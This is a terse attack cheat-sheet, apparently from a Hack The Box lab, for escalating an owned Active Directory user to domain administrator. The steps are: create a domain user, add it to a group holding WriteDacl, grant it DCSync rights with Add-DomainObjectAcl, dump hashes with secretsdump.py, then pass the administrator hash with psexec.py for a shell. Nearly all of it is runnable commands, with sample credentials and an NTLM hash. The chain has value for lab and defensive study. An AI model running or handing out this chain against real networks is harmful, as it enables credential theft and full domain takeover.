path example - join group and WriteDACL

owned user -> administrator via joining group allowed to modify DACL (Discretionary Access Control List)

  1. create domain user
net user user pass /add /domain
  1. add user to the group allowed to perform WriteDacl
net group group user /add /domain
  1. create password
$pass = convertto-securestring pass -asplaintext -force
  1. create PSCredential object
$cred = new-object system.management.automation.pscredential(domain, $pass)
  1. grant the created user DCSync privileges by adding Domain Object A
Add-DomainObjectAcl -Credential $cred -TargetIdentity DC=domain,DC=local -PrincipalIdentity user -Rights DCSync
  1. on attacker machine, perform hashdump using secretsdump.py
secretsdump.py htb.local/hans:hans123@$IP
  1. use psexec.py to reuse the administrator hash to get shell as admin
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 -target-ip IP administrator@IP